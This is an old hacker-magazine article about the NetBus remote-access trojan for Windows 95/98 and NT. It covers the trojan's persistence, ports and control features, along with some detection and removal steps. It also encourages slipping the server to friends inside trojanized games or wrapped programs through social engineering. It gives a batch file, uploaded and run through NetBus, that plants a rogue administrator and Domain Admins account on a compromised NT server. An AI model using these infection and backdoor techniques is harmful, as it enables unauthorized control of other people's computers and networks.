Wreaking Havoc with NetBus
by Sikdogg
NetBus, just like Back Orifice, lets a user take control of a remote host on a TCP/IP network.
Both programs have similar and distinct functions that separate them from one another. One feature that makes NetBus, more fun to use is that it runs in both Windows 95/98 and NT! Back Orifice currently runs on only the Windows 95/98 platform. NetBus, was written by a Swedish programmer named Carl-Fredrik Neikter in March 1998. He first released NetBus 1.53 in April and then NetBus v1.6 in August. Even though NetBus, hasn't gotten much press, it is still pretty widespread.
How NetBus Works
In principle, NetBus, and Back Orifice work the same way - they have a server (the program that runs on the remote host) and a client (the program you run on your PC).
Once the server is running on a remote PC, the client is run on your computer to find and exploit the remote PC. Because the NetBus, server is larger than the Back Orifice server, some believe that NetBus, is "less stealthy." I disagree. The NetBus, server can be renamed and/or Trojanized just like Back Orifice using Saran Wrap or Silk Rope.
You can also download Whack Job, which contains a game called Whack-a-Mole (which has the NetBus, server in it - there is also a version of Whack-a-Mole with Back Orifice), and send it to your friends. When they run it NetBus, gets installed on their PC.
One disadvantage of NetBus, is that you can't change the port that NetBus, uses to communicate. Its default is port: 12345
There are currently two versions of NetBus, in circulation, version 1.53 and version 1.6.
Version 1.6 is used more often because it has all the functionality of v1.53 and some upgrades, so I'm going to save space by eliminating v1.53 from this article. This article was written using the README.TXT that comes with NetBus,, a lot of text available on the net, and from my personal use of NetBus, at work, at home, and at school.
NetBus v1.6
The NetBus v1.6 server is called: Patch.exe
It can be renamed anything as long as you keep the EXE extension. If you change the extension, it should still work technically, but the problem lies in Windows itself.
If you change the extension Windows won't know that it's an executable and it probably won't run. The server size is 494,592 bytes (v1.7) versus approximately 124k for Back Orifice.
When the server program is run, it doesn't disappear like Back Orifice. It just stays there and looks like nothing happened and can even be deleted. What it does is copy itself to the Windows\System directory and start up every time Windows restarts.
It also adds itself to the Registry by creating the key HKEY_CURRENT_USER\PATCH (PATCH would be replaced by whatever you renamed the server to be).
It also places a value in the key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NAME which shows the full path of the server file.
The NAME is the name of the server without the extension, and it should always be capitalized. The default is PATCH. This is how Windows starts the NetBus, server every time it starts.
The NetBus, server actually opens two TCP ports. It listens for a client on port 12345 and responds on port 12346.
What makes NetBus, really nice is its GUI interface. It's really intuitive and user friendly that even newbies shouldn't have problems figuring it out.
Here's a description of some of the buttons/features on NetBus v1.6,:
- Server admin - Lets you add/change passwords, close, or remove the server from the remote host.
- Show image - Lets you display a BMP image on the screen that the user can't remove.
- Swap mouse - Lets you swap the mouse buttons.
- Start program - Lets you run the program on the Program/URL window.
- Msg manager - Lets you send messages to remote hosts and allow them to respond back.
- Screendump - Lets you see the remote host's screen.
- Get info - Lets you get info about host like who's logged on.
- Exit Windows - Lets you log off, power off, reboot, or shutdown the host.
- Active wnds - Lets you see all the active windows on the host and close any of them.
- Control mouse - Lets you control the mouse on the host's computer.
- Key manager - Lets you disable the host's keyboard.
- File manager - Lets you see the host's hard drives, upload, download, and delete files.
Detection/Removal
NetBus is pretty easy to remove from your PC if you've been infected.
To find out if you have NetBus installed on your PC you can use any of these methods:
• Telnet to your computer using localhost or 127.0.0.1 for an address and port 12345. Example: telnet 127.0.0.1 12345
• If you are infected you will get the message: NetBus 1.60 x or NetBus 1.53 x depending on version installed.
• You can download and run the NetBus client and try to connect to localhost. If you get a connection or a password dialog box, your PC is infected. The NetBus password is stored in the Registry in HKEY_CURRENT_USER\PATCH\Settings\ServerPwd. (PATCH is the default name and may have been changed. Look for unusual names.)
• You can run: netstat -an | find "12345" If you're infected, you will get: TCP 0.0.0.0:12345 0.0.0.0 LISTENING
• Check the Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run - this key will show the full path and name of the server. (PATCH is the default name and may have been changed. Look for unusual names.)
To remove the server, you can use any of these methods:
• Get the password (if necessary), run the NetBus client, make a connection to localhost, enter the password (if necessary), go to Server admin -> Remove server.
• Find the path and server name in the Registry, remove the Registry entry, restart Windows, remove the server file from Windows Explorer.
• Find the path and server name in the Registry, boot to DOS, and manually remove server file. (If after using this method, you get an error at startup about Windows not being able to find some program files, go to the Registry and remove the pathname of the NetBus server.)
• Download and install NetBuster on your system and it will tell you if you have NetBus installed and if it is ever installed on your system at a later time. It will also ask you if you want it removed.
Using NetBus
Making a connection to the remote host is easy:
1.) You need to get the IP address of the remote host. If you don't know how to get someone's IP address you have no business using NetBus.
2.) Get the NetBus server on the remote PC and execute it. You can use your "social engineering" skills, Whack-a-Mole, or you can use Silk Rope to attach it to some goofy program and send it to friends (my favorite method). (Note: The remote PC must be either connected to a TCP/IP network or the Internet in order for you to make a connection.)
3.) Once you make the connection you can use any of the commands listed above.
Here's a neat trick I found on Ecoli's webpage: 24.3.219.20/ftproot/security/security%20 web/netbus.html
You can use this to create an administrator account on an NT server once you get the NetBus server installed and are able to established a connection with the NT box:
Create a batch file with the following lines:
net user ecoli /add net localgroup administrators ecoli /add net group "Domain Admins" ecoli /add(Note: Ecoli is a sample username - any name will do).
Save the file to your hard drive. For example, let's say we save the file as ecoliadm.bat on the C: drive.
Connect to the target PC using NetBus. Click File manager -> Upload - and choose: C:\ecoliadm.bat
Type in C:\ecoliadm.bat as the upload path and click Close. Type C:\ecoliadm.bat in the Program/URL text box. Click Start program.
Closing
NetBus is a very fun and effective tool that does everything it claims and then some.
Contrary to what the media would have us all believe, programs like NetBus and Back Orifice can be used for legitimate purposes. In fact, I personally know more than one network administrator who uses NetBus to remotely administer their NT network.
So when using NetBus and/or similar tools, try to remember to be responsible and not destroy other people's property.